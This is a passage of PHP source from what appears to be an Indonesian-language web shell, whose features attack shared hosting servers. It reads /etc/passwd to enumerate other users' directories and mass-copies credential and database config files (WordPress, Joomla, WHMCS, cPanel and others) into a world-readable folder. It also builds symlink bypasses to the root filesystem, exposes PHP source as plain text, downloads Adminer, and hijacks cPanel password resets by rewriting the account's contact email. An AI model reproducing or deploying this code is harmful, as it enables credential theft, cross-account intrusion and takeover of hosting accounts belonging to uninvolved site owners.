864. foreach($urls as $url) {
865. $url = str_replace(array("http://","www."), "", strtolower($url));
866. $etc = "/etc/passwd";
867. $f = fopen($etc,"r");
868. while($gets = fgets($f)) {
869. $pecah = explode(":", $gets);
870. $user = $pecah[0];
871. $dir_user = "/hsphere/local/home/$user";
872. if(is_dir($dir_user) === true) {
873. $url_user = $dir_user."/".$url;
874. if(is_readable($url_user)) {
875. $i++;
876. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
877. if(is_writable($url_user)) {
878. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
879. }
880. echo $jrw."<br>";
881. }
882. }
883. }
884. }
885. if($i == 0) {
886. } else {
887. echo "<br>Total ada ".$i." di ".$ip;
888. }
889. echo "</pre>";
890. } else {
891. echo '<center>
892. <form method="post">
893. List Domains: <br>
894. <textarea name="url" class="form-control">';
895. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
896. while($getss = fgets($fp)) {
897. echo $getss;
898. }
899. echo '</textarea><br>
900. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
901. </form></center>';
902. }
903. } elseif(preg_match("/vhosts/", $dir)) {
904. $urls = explode("\r\n", $_POST['url']);
905. if(isset($_POST['jump'])) {
906. echo "<pre>";
907. foreach($urls as $url) {
908. $web_vh = "/var/www/vhosts/$url/httpdocs";
909. if(is_dir($web_vh) === true) {
910. if(is_readable($web_vh)) {
911. $i++;
912. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
913. if(is_writable($web_vh)) {
914. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
915. }
916. echo $jrw."<br>";
917. }
918. }
919. }
920. if($i == 0) {
921. } else {
922. echo "<br>Total ada ".$i." Kamar di ".$ip;
923. }
924. echo "</pre>";
925. } else {
926. echo '<center>
927. <form method="post">
928. List Domains: <br>
929. <textarea name="url" class="form-control">';
930. bing("ip:$ip");
931. echo '</textarea><br>
932. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
933.  
934. </form></center>';
935. }
936. } else {
937. echo "<pre>";
938. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
939. while($passwd = fgets($etc)) {
940. if($passwd == '' || !$etc) {
941. echo "<font color=red>Can't read /etc/passwd</font><br/>";
942. } else {
943. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
944. foreach($user_jumping[1] as $user_pro_jump) {
945. $user_jumping_dir = "/home/$user_pro_jump/public_html";
946. if(is_readable($user_jumping_dir)) {
947. $i++;
948. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
949. if(is_writable($user_jumping_dir)) {
950. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
951. }
952. echo $jrw;
953. if(function_exists('posix_getpwuid')) {
954. $domain_jump = file_get_contents("/etc/named.conf");
955. if($domain_jump == '') {
956. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
957. } else {
958. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
959. foreach($domains_jump[1] as $dj) {
960. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
961. $user_jumping_url = $user_jumping_url['name'];
962. if($user_jumping_url == $user_pro_jump) {
963. echo " => ( <u>$dj</u> )<br>";
964. break;
965. }
966. }
967. }
968. } else {
969. echo "<br>";
970. }
971. }
972. }
973. }
974. }
975. if($i == 0) {
976. } else {
977. echo "<br>Total ada ".$i." Kamar di ".$ip;
978. }
979. echo "</pre>";
980. }
981. echo "</div>";
982. }
983.  
984. /*
985. Config
986. */
987. if($_GET['aksi'] == 'config') {
988. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
989. $con = mkdir("codexploit_configs", 0777);
990. $isi_htc = "Options all\nRequire None\nSatisfy Any";
991. $htc = fopen("codexploit_configs/.htaccess","w");
992. fwrite($htc, $isi_htc);
993. while($passwd = fgets($etc)) {
994. if($passwd == "" || !$etc) {
995. echo "<font color=red>Can't read /etc/passwd</font>";
996. } else {
997. preg_match_all('/(.*?):x:/', $passwd, $user_config);
998. foreach($user_config[1] as $user_con) {
999. $user_config_dir = "/home/$user_con/public_html/";
1000. if(is_readable($user_config_dir)) {
1001. $grab_config =
1002. [
1003. "/home/$user_con/.my.cnf" => "cpanel",
1004. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
1005. "/home/$user_con/public_html/forum/config.php" => "phpBB",
1006. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
1007. "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
1008. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
1009. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
1010. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
1011. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
1012. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
1013. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
1014. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
1015. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
1016. "/home/$user_con/public_html/inc/config.php" => "MyBB",
1017. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
1018. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
1019. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
1020. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
1021. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
1022. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
1023. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
1024. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
1025. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
1026. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
1027. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
1028. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
1029. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
1030. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
1031. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
1032. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
1033. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
1034. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
1035. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
1036. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
1037. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
1038. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
1039. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
1040. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
1041. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
1042. "/home/$user_con/public_html/configuration.php" => "Joomla",
1043. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
1044. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
1045. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
1046. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
1047. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
1048. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
1049. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
1050. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
1051. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
1052. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
1053. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
1054. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
1055. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
1056. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
1057. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
1058. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
1059. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
1060. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
1061. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
1062. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
1063. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
1064. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
1065. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
1066. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
1067. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
1068. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
1069. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
1070. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
1071. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
1072. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
1073. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
1074. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
1075. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
1076. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
1077. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
1078. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
1079. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
1080. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
1081. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
1082. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
1083. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
1084. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
1085. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
1086. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
1087. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
1088. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
1089. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
1090. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
1091. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
1092. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
1093. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
1094. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
1095. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
1096. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
1097. "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
1098. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
1099. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
1100. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
1101. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
1102. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
1103. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
1104. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
1105. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
1106. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
1107. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
1108. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
1109. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
1110. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
1111. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
1112. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
1113. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
1114. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
1115. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
1116. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
1117. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
1118. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
1119. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
1120. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
1121. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
1122. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
1123. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
1124. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
1125. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
1126. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
1127. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
1128. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
1129. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
1130. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
1131. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
1132. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
1133. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
1134. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
1135. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
1136. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
1137. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
1138. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
1139. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
1140. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
1141. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
1142. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
1143. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
1144. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
1145. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
1146. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
1147. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
1148. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
1149. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
1150. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
1151. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
1152. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
1153. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
1154. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
1155. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
1156. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
1157. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
1158. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
1159. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
1160. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
1161. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
1162. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
1163. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
1164. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
1165. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
1166. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
1167. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
1168. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
1169. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
1170. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
1171. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
1172. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
1173. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
1174. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
1175. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
1176. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
1177. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
1178. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
1179. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
1180. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
1181. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
1182. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
1183. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
1184. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
1185. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
1186. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
1187. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
1188. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
1189. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
1190. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
1191. ];
1192. foreach($grab_config as $config => $nama_config) {
1193. $ambil_config = file_get_contents($config);
1194. if($ambil_config == '') {
1195. } else {
1196. $file_config = fopen("codexploit_configs/$user_con-$nama_config.txt","w");
1197. fputs($file_config,$ambil_config);
1198. }
1199. }
1200. }
1201. }
1202. }
1203. }
1204. echo "<center><a href='?dir=$path/codexploit_configs'><font color=lime>Done</font></a></center>";
1205. }
1206.  
1207. /*
1208. Adminer
1209. */
1210. if($_GET['aksi'] == 'adminer') {
1211. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
1212. function adminer($url, $isi) {
1213. $fp = fopen($isi, "w");
1214. $ch = curl_init();
1215. curl_setopt($ch, CURLOPT_URL, $url);
1216. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1217. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1218. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1219. curl_setopt($ch, CURLOPT_FILE, $fp);
1220. return curl_exec($ch);
1221. curl_close($ch);
1222. fclose($fp);
1223. ob_flush();
1224. flush();
1225. }
1226. if(file_exists('adminer.php')) {
1227. echo "<center><a href='$full/adminer.php' target='_blank'>-> Silahkan Login Adminer <-</a></font></center><br/>";
1228. } else {
1229. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1230. echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
1231. } else {
1232. echo "<center><font color=red>gagal buat file adminer</font></center><br/>";
1233. }
1234. }
1235. exit;
1236. }
1237.  
1238.  
1239. /*
1240. Symlink
1241. */
1242. if($_GET['aksi'] == 'symlink') {
1243. if(!is_file('named.txt')){
1244. $d00m = @file("/etc/named.conf");
1245. }else{
1246. $d00m = @file("named.txt");
1247. }
1248. if(!$d00m) {
1249. die ("<center>
1250. [ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ]
1251. [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ]
1252. [ <a href='?dir=$path&aksi=sym_bypas'>Bypass Symlink</a> ]
1253. <br/>
1254. <font color='red'>Gagal Membaca /etc/named.conf</font>
1255. <br/><br/></center>");
1256. }
1257. else{
1258. echo "<center>
1259. [ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ]
1260. [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ]
1261. [ <a href='?dir=$path&aksi=sym_bypas'>Bypass Symlink</a> ]
1262. <div class='tmp'></center>
1263. <table align='center' width='100%'>
1264. <thead class='bg-info'>
1265. <th>Domains</th>
1266. <th>Users</th>
1267. <th>symlink </th>
1268. </thead>";
1269. foreach($d00m as $dom){
1270. if(eregi("zone",$dom)){
1271. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1272. flush();
1273. if(strlen(trim($domsws[1][0])) > 2){
1274. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1275. flush();
1276. $site = $user['name'] ;
1277. @symlink("/","sym/root");
1278. $site = $domsws[1][0];
1279. $ir = 'ir';
1280. $il = 'il';
1281. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) {
1282. $site = ".$domsws[1][0].";
1283. }
1284. echo "
1285. <tr>
1286. <td>
1287. <a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a>
1288. </td>
1289. <td>
1290. ".$user['name']."
1291. </td>
1292. <td>
1293. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a>
1294. </td>
1295. </tr>";
1296. flush();
1297. flush();
1298. }
1299. }
1300. }
1301. echo "</table>
1302. </div><br/>";
1303. }
1304. exit;
1305. }
1306.  
1307. if($_GET['aksi'] == 'symread') {
1308. echo "read /etc/named.conf";
1309. echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
1310. <textarea class='form-control' rows='8' name='file'>";
1311. flush();
1312. flush();
1313. $file = '/etc/named.conf';
1314. $r3ad = @fopen($file, 'r');
1315. if ($r3ad){
1316. $content = @fread($r3ad, @filesize($file));
1317. echo "".htmlentities($content)."";
1318. }else if (!$r3ad) {
1319. $r3ad = @show_source($file) ;
1320. }else if (!$r3ad) {
1321. $r3ad = @highlight_file($file);
1322. }else if (!$r3ad) {
1323. $sm = @symlink($file,'sym.txt');
1324. if ($sm){
1325. $r3ad = @fopen('sym/sym.txt', 'r');
1326. $content = @fread($r3ad, @filesize($file));
1327. echo "".htmlentities($content)."";
1328. }
1329. }
1330. echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
1331. if(isset($_GET['save'])){
1332. $cont = stripcslashes($_POST['file']);
1333. $f = fopen('named.txt','w');
1334. $w = fwrite($f,$cont);
1335. if($w){
1336. echo '<br/>save has been successfully';
1337. }
1338. fclose($f);
1339. }
1340. exit;
1341. }
1342.  
1343. if ($_GET['aksi'] == 'sym_404'){
1344. echo '<h2>Symlink 404</h2>
1345. <form method="post">
1346. File Target: <input type="text" class="form-control" name="dir" value="/home/user/public_html/wp-config.php"><br>
1347. Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
1348. <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
1349. </form>';
1350. if($_POST['execute']){
1351. rmdir("xploit404");
1352. mkdir("xploit404", 0777);
1353. $dir = $_POST['dir'];
1354. $isi = $_POST['isi'];
1355. system("ln -s ".$dir."xploit404/".$isi);
1356. symlink($dir,"xploit404/".$isi);
1357. $inija = fopen("xploit404/.htaccess", "w");
1358. fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any");
1359. echo'<a href="/xploit404/" target="_blank"> >>Sukses<< </a>';
1360. }
1361. exit;
1362. }
1363.  
1364.  
1365. if ($_GET['aksi'] == 'sym_bypas'){
1366. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
1367. $cont = stripcslashes($_POST['file']);
1368. if(!file_exists('passwd.txt')){
1369. $f = @fopen('passwd.txt','w');
1370. $w = @fwrite($f,$cont);
1371. fclose($f);
1372. }
1373. if($w or @filesize('passwd.txt') > 0){
1374. echo "<div class='tmp'>
1375. <table width='100%'>
1376. <thead class='bg-info'>
1377. <th>Users</th>
1378. <th>symlink</th>
1379. <th>FTP</th>
1380. </thead>";
1381. flush();
1382. $fil3 = file('passwd.txt');
1383. foreach ($fil3 as $f){
1384. $u=explode(':', $f);
1385. $user = $u['0'];
1386. echo "<tr>
1387. <td class='left'>$user</td>
1388. <td>
1389. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
1390. </td>
1391. <td>
1392. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
1393. </td>
1394. </tr>";
1395. flush();
1396. flush();
1397. }
1398. die ("</tr></table></div>");
1399. }
1400.  
1401. }
1402.  
1403. echo "read /etc/passwd";
1404. echo "<br/><form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
1405. <textarea class='form-control' rows='8' name='file'>";
1406. flush();
1407. $file = '/etc/passwd';
1408. $r3ad = @fopen($file, 'r');
1409. if ($r3ad){
1410. $content = @fread($r3ad, @filesize($file));
1411. echo "".htmlentities($content)."";
1412. }elseif(!$r3ad) {
1413. $r3ad = @show_source($file) ;
1414. }elseif(!$r3ad) {
1415. $r3ad = @highlight_file($file);
1416. }elseif(!$r3ad) {
1417.  
1418. for($uid=0;$uid<1000;$uid++){
1419. $ara = posix_getpwuid($uid);
1420. if (!empty($ara)) {
1421. while (list ($key, $val) = each($ara)){
1422. print "$val:";
1423. }
1424. print "\n";
1425. }
1426. }
1427. }
1428. flush();
1429. echo "</textarea><br/>
1430. <input type='submit' class='btn btn-danger btn-block' value='Symlink'/><br/>
1431. </form>";
1432. flush();
1433. exit;
1434. }
1435.  
1436.  
1437. if ($_GET['aksi'] == 'CpanelReset') {
1438. echo '<br/><p class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</p>
1439. <form method="POST">
1440. <div class="form-group">
1441. <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/><br/>
1442. <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
1443. </div>
1444. </form>';
1445.  
1446. if(isset($_POST['submit'])){
1447. $user = get_current_user();
1448. $site = $_SERVER['HTTP_HOST'];
1449. $ips = getenv('REMOTE_ADDR');
1450. $email = $_POST['email'];
1451. $wr = 'email:'.$email;
1452. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
1453. fwrite($f, $wr);
1454. fclose($f);
1455. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
1456. fwrite($f, $wr);
1457. fclose($f);
1458. $parm = $site.':2082/resetpass?start=1';
1459. echo '<br/>Url: '.$parm.'';
1460. echo '<br/>Username: '.$user.'';
1461. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
1462. }
1463. exit;
1464. }
1465.  
1466. if(isset($_GET['path'])){
1467. $path = $_GET['path'];
1468. chdir($path);
1469. }else{
1470. $path = getcwd();
1471. }
1472. $path = str_replace('\\','/',$path);
1473. $paths = explode('/',$path);
1474. echo "<br/>Lokasi Saat Ini => ";
1475. foreach($paths as $id=>$pat){
1476. if($pat == '' && $id == 0){
1477. $a = true;
1478. echo '<a href="?dir=/">/</a>';
1479. continue;
1480. }
1481. if($pat == '') continue;
1482. echo '<a href="?dir=';
1483. for($i=0;$i<=$id;$i++){
1484. echo "$paths[$i]";
1485. if($i != $id) echo "/";
1486. }
1487. echo '">'.$pat.'</a>/';
1488. }
1489. $scandir = scandir($path);
1490. echo "<hr>";
1491. echo '<div class="table-responsive-lg">
1492. <table class="table table-hover table-bordered text-white">
1493. <thead class="bg-warning text-dark text-center">
1494. <th scope="col">Nama</th>
1495. <th scope="col">Type</th>
1496. <th scope="col">Size</th>
1497. <th scope="col">Permission</th>
1498. <th scope="col">Action</th>
1499. </thead>';
1500.  
1501. foreach($scandir as $dir){
1502.  
1503. /* cek jika ini berbentuk folder */
1504. /* cek jika nama folder karaker terlalu panjang */
1505. if (strlen($dir) > 25) {
1506. $_dir = substr($dir, 0, 25)."...";
1507. }else{
1508. $_dir = $dir;
1509. }
1510. if(!is_dir($path.'/'.$file)) continue;
1511. $size = filesize($path.'/'.$file)/1024;
1512. $size = round($size,3);
1513.  
1514. if($size >= 1024){
1515. $size = round($size/1024,2).' MB';
1516. }else{
1517. $size = $size.' KB';
1518. }
1519. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
1520. echo
1521. '<tr>
1522. <td class="text-white">
1523. <img src="http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png" class="ico"></img> <a href="?dir='.$path.'/'.$dir.'">'.$_dir.'</a></td>
1524. <td class="text-center">Directory</td>
1525. <td class="text-white"><center>'.$size.'</center></td>
1526. <td class="text-white"><center>';
1527. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
1528. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
1529. echo perms($path.'/'.$dir);
1530. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></center></td>
1531. <td><center>
1532. <a title="Ubah Nama" class="badge" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder">&nbsp;Ubah Nama</a>&nbsp;&nbsp;
1533. <a title="Delete" class="badge" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder">&nbsp;Hapus</a>
1534. </td>
1535. ';
1536. }
1537.  
1538. foreach($scandir as $file){
1539.  
1540.  
1541. if(!is_file($path.'/'.$file)) continue;
1542. $size = filesize($path.'/'.$file)/1024;
1543. $size = round($size,3);
1544.  
1545. if($size >= 1024){
1546. $size = round($size/1024,2).' MB';
1547. }else{
